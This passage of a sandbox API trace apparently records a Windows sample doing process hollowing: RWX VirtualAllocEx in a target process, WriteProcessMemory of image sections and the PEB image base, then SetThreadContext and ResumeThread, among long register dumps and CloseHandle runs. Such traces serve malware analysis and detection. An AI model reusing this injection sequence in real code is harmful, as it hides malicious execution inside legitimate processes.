FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x143770e, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0172.809] ReadProcessMemory (in: hProcess=0x5548, lpBaseAddress=0x7efde008, lpBuffer=0x33dd24, nSize=0x4, lpNumberOfBytesRead=0x33dd74 | out: lpBuffer=0x33dd24*, lpNumberOfBytesRead=0x33dd74*=0x4) returned 1 [0172.815] VirtualAllocEx (hProcess=0x5548, lpAddress=0x400000, dwSize=0x153000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0172.835] WriteProcessMemory (in: hProcess=0x5548, lpBaseAddress=0x400000, lpBuffer=0x39376c8*, nSize=0x400, lpNumberOfBytesWritten=0x33dd74 | out: lpBuffer=0x39376c8*, lpNumberOfBytesWritten=0x33dd74*=0x400) returned 1 [0172.891] WriteProcessMemory (in: hProcess=0x5548, lpBaseAddress=0x401000, lpBuffer=0x2ab2a18*, nSize=0x11c00, lpNumberOfBytesWritten=0x33dd74 | out: lpBuffer=0x2ab2a18*, lpNumberOfBytesWritten=0x33dd74*=0x11c00) returned 1 [0172.973] WriteProcessMemory (in: hProcess=0x5548, lpBaseAddress=0x413000, lpBuffer=0x2ac4624*, nSize=0x4a00, lpNumberOfBytesWritten=0x33dd74 | out: lpBuffer=0x2ac4624*, lpNumberOfBytesWritten=0x33dd74*=0x4a00) returned 1 [0173.027] WriteProcessMemory (in: hProcess=0x5548, lpBaseAddress=0x418000, lpBuffer=0x2ac9030*, nSize=0x600, lpNumberOfBytesWritten=0x33dd74 | out: lpBuffer=0x2ac9030*, lpNumberOfBytesWritten=0x33dd74*=0x600) returned 1 [0173.066] WriteProcessMemory (in: hProcess=0x5548, lpBaseAddress=0x54e000, lpBuffer=0x2ac963c*, nSize=0x2e00, lpNumberOfBytesWritten=0x33dd74 | out: lpBuffer=0x2ac963c*, lpNumberOfBytesWritten=0x33dd74*=0x2e00) returned 1 [0173.106] WriteProcessMemory (in: hProcess=0x5548, lpBaseAddress=0x551000, lpBuffer=0x2acc448*, nSize=0x1000, lpNumberOfBytesWritten=0x33dd74 | out: lpBuffer=0x2acc448*, lpNumberOfBytesWritten=0x33dd74*=0x1000) returned 1 [0173.170] WriteProcessMemory (in: hProcess=0x5548, lpBaseAddress=0x552000, lpBuffer=0x2acd454*, nSize=0x200, lpNumberOfBytesWritten=0x33dd74 | out: lpBuffer=0x2acd454*, lpNumberOfBytesWritten=0x33dd74*=0x200) returned 1 [0173.224] WriteProcessMemory (in: hProcess=0x5548, lpBaseAddress=0x7efde008, lpBuffer=0x2acd660*, nSize=0x4, lpNumberOfBytesWritten=0x33dd74 | out: lpBuffer=0x2acd660*, lpNumberOfBytesWritten=0x33dd74*=0x4) returned 1 [0173.227] SetThreadContext (hThread=0xc500, lpContext=0x2ab2688*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x405907, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0173.232] ResumeThread (hThread=0xc500) returned 0x1 [0173.624] CoGetContextToken (in: pToken=0x33e188 | out: pToken=0x33e188) returned 0x0 [0173.624] CObjectContext::QueryInterface () returned 0x0 [0173.624] CObjectContext::GetCurrentThreadType () returned 0x0 [0173.624] Release () returned 0x0 [0173.625] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x73bd90*=0xa8, lpdwindex=0x33e02c | out: lpdwindex=0x33e02c) returned 0x0 Thread: id = 100 os_tid = 0x428 Thread: id = 101 os_tid = 0x4a4 [0150.257] CoGetContextToken (in: pToken=0x102f77c | out: pToken=0x102f77c) returned 0x800401f0 [0150.266] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0168.755] CloseHandle (hObject=0x2a4) returned 1 [0168.755] CloseHandle (hObject=0x2a0) returned 1 [0168.755] CloseHandle (hObject=0x29c) returned 1 [0168.755] CloseHandle (hObject=0x298) returned 1 [0168.756] CloseHandle (hObject=0x294) returned 1 [0168.756] CloseHandle (hObject=0x290) returned 1 [0168.756] CloseHandle (hObject=0x2c0) returned 1 [0168.756] CloseHandle (hObject=0x28c) returned 1 [0168.756] CloseHandle (hObject=0x2cc) returned 1 [0168.757] CloseHandle (hObject=0x288) returned 1 [0168.757] CloseHandle (hObject=0x2bc) returned 1 [0168.757] CloseHandle (hObject=0x2b8) returned 1 [0168.757] CloseHandle (hObject=0x284) returned 1 [0168.757] CloseHandle (hObject=0x280) returned 1 [0168.757] CloseHandle (hObject=0x2b4) returned 1 [0168.757] CloseHandle (hObject=0x27c) returned 1 [0168.758] CloseHandle (hObject=0x278) returned 1 [0168.758] CloseHandle (hObject=0x2b0) returned 1 [0168.758] CloseHandle (hObject=0x268) returned 1 [0168.758] CloseHandle (hObject=0x2c4) returned 1 [0168.758] CloseHandle (hObject=0x274) returned 1 [0168.758] CloseHandle (hObject=0x2ac) returned 1 [0168.758] CloseHandle (hObject=0x270) returned 1 [0168.758] CloseHandle (hObject=0x2a8) returned 1 [0169.876] CloseHandle (hObject=0x4c78) returned 1 [0169.877] CloseHandle (hObject=0x12094) returned 1 [0169.877] CloseHandle (hObject=0xb44) returned 1 [0169.877] CloseHandle (hObject=0xb6c) returned 1 [0169.877] CloseHandle (hObject=0xfdd8) returned 1 [0169.877] CloseHandle (hObject=0x2e78) returned 1 [0169.877] CloseHandle (hObject=0xfef8) returned 1 [0169.877] CloseHandle (hObject=0x1770) returned 1 [0169.877] CloseHandle (hObject=0x3cb0) returned 1 [0169.877] CloseHandle (hObject=0xa43c) returned 1 [0169.877] CloseHandle (hObject=0x141b0) returned 1 [0169.877] CloseHandle (hObject=0x12244) returned 1 [0169.878] CloseHandle (hObject=0x1d20) returned 1 [0169.878] CloseHandle (hObject=0x13444) returned 1 [0169.878] CloseHandle (hObject=0x44c4) returned 1 [0169.878] CloseHandle (hObject=0x1061c) returned 1 [0169.878] CloseHandle (hObject=0xcadc) returned 1 [0169.878] CloseHandle (hObject=0x1cb8) returned 1 [0169.878] CloseHandle (hObject=0x4398) returned 1 [0169.878] CloseHandle (hObject=0xb964) returned 1 [0169.878] CloseHandle (hObject=0x1e74) returned 1 [0169.878] CloseHandle (hObject=0x13e10) returned 1 [0169.878] CloseHandle (hObject=0xc92c) returned 1 [0169.878] CloseHandle (hObject=0x559c) returned 1 [0169.878] CloseHandle (hObject=0xf584) returned 1 [0169.879] CloseHandle (hObject=0x13e24) returned 1 [0169.879] CloseHandle (hObject=0xbe54) returned 1 [0169.879] CloseHandle (hObject=0x20cc) returned 1 [0169.879] CloseHandle (hObject=0x588) returned 1 [0169.879] CloseHandle (hObject=0xb60c) returned 1 [0169.879] CloseHandle (hObject=0xcf88) returned 1 [0169.879] CloseHandle (hObject=0x3b68) returned 1 [0169.879] CloseHandle (hObject=0x3ed8) returned 1 [0169.879] CloseHandle (hObject=0x55ec) returned 1 [0169.879] CloseHandle (hObject=0x2f9c) returned 1 [0169.879] CloseHandle (hObject=0x2fec) returned 1 [0169.879] CloseHandle (hObject=0x454) returned 1 [0169.880] CloseHandle (hObject=0x10190) returned 1 [0169.880] CloseHandle (hObject=0x4a4) returned 1 [0169.880] CloseHandle (hObject=0x4cc) returned 1 [0169.880] CloseHandle (hObject=0xac6c) returned 1 [0169.880] CloseHandle (hObject=0x43d0) returned 1 [0169.880] CloseHandle (hObject=0x3990) returned 1 [0169.880] CloseHandle (hObject=0x16e0) returned 1 [0169.880] CloseHandle (hObject=0x124e0) returned 1 [0169.880] CloseHandle (hObject=0x11f8) returned 1 [0169.880] CloseHandle (hObject=0x1339c) returned 1 [0169.880] CloseHandle (hObject=0x12798) returned 1 [0169.880] CloseHandle (hObject=0xac0c) returned 1 [0169.881] CloseHandle (hObject=0x143a0) returned 1 [0169.881] CloseHandle (hObject=0x3e68) returned 1 [0169.881] CloseHandle (hObject=0x127e4) returned 1 [0169.881] CloseHandle (hObject=0xb57c) returned 1 [0169.881] CloseHandle (hObject=0x471c) returned 1 [0169.881] CloseHandle (hObject=0x257c) returned 1 [0169.881] CloseHandle (hObject=0xca0c) returned 1 [0169.881] CloseHandle (hObject=0x2bb8) returned 1 [0169.881] CloseHandle (hObject=0x4ce4) returned 1 [0169.881] CloseHandle (hObject=0x7b4) returned 1 [0169.881] CloseHandle (hObject=0x50c8) returned 1 [0169.881] CloseHandle (hObject=0x5024) returned 1 [0169.882] CloseHandle (hObject=0x5984) returned 1 [0169.882] CloseHandle (hObject=0xcb10) returned 1 [0169.882] CloseHandle (hObject=0x421c) returned 1 [0169.882] CloseHandle (hObject=0x3388) returned 1 [0169.882] CloseHandle (hObject=0x125b4) returned 1 [0169.882] CloseHandle (hObject=0xad48) returned 1 [0169.882] CloseHandle (hObject=0xf96c) returned 1 [0169.882] CloseHandle (hObject=0x10310) returned 1 [0169.882] CloseHandle (hObject=0x27a8) returned 1 [0169.882] CloseHandle (hObject=0x4bfc) returned 1 [0169.882] CloseHandle (hObject=0xfaf0) returned 1 [0169.882] CloseHandle (hObject=0xad4) returned 1 [0169.882] CloseHandle (hObject=0x1940) returned 1 [0169.883] CloseHandle (hObject=0x11fa0) returned 1 [0169.883] CloseHandle (hObject=0x42c4) returned 1 [0169.883] CloseHandle (hObject=0x2af8) returned 1 [0169.883] CloseHandle (hObject=0x2f88) returned 1 [0169.883] CloseHandle (hObject=0x1077c) returned 1 [0169.883] CloseHandle (hObject=0x345c) returned 1 [0169.883] CloseHandle (hObject=0x11ff8) returned 1 [0169.883] CloseHandle (hObject=0xb1a4) returned 1 [0169.883] CloseHandle (hObject=0x2b30) returned 1 [0169.883] CloseHandle (hObject=0xc984) returned 1 [0169.883] CloseHandle (hObject=0x3ac4) returned 1 [0169.883] CloseHandle (hObject=0x2ba0) returned 1 [0169.884] CloseHandle (hObject=0x3aec) returned 1 [0169.884] CloseHandle (hObject=0x3b00) returned 1 [0169.884] CloseHandle (hObject=0x2e70) returned 1 [0169.884] CloseHandle (hObject=0x1c08) returned 1 [0169.884] CloseHandle (hObject=0x109d8) returned 1 [0169.884] CloseHandle (hObject=0x5160) returned 1 [0169.884] CloseHandle (hObject=0x10510) returned 1 [0169.884] CloseHandle (hObject=0x5538) returned 1 [0169.884] CloseHandle (hObject=0xb610) returned 1 [0169.884] CloseHandle (hObject=0x1da8) returned 1 [0169.885] CloseHandle (hObject=0x13c90) returned 1 [0169.885] CloseHandle (hObject=0x39d8) returned 1 [0169.885] CloseHandle (hObject=0x10170) returned 1 [0169.885] CloseHandle (hObject=0x13484) returned 1 [0169.885] CloseHandle (hObject=0xa7dc) returned 1 [0169.885] CloseHandle (hObject=0xac4c) returned 1 [0169.885] CloseHandle (hObject=0x1444c) returned 1 [0169.885] CloseHandle (hObject=0xa54) returned 1 [0169.885] CloseHandle (hObject=0x5008) returned 1 [0169.885] CloseHandle (hObject=0x57e4) returned 1 [0169.885] CloseHandle (hObject=0x470c) returned 1 [0169.886] CloseHandle (hObject=0x1369c) returned 1 [0169.886] CloseHandle (hObject=0x1748) returned 1 [0169.886] CloseHandle (hObject=0x2c40) returned 1 [0169.886] CloseHandle (hObject=0x1a90) returned 1 [0169.886] CloseHandle (hObject=0x38fc) returned 1 [0169.886] CloseHandle (hObject=0x13664) returned 1 [0169.886] CloseHandle (hObject=0x105cc) returned 1 [0169.886] CloseHandle (hObject=0x2788) returned 1 [0169.886] CloseHandle (hObject=0xb68c) returned 1 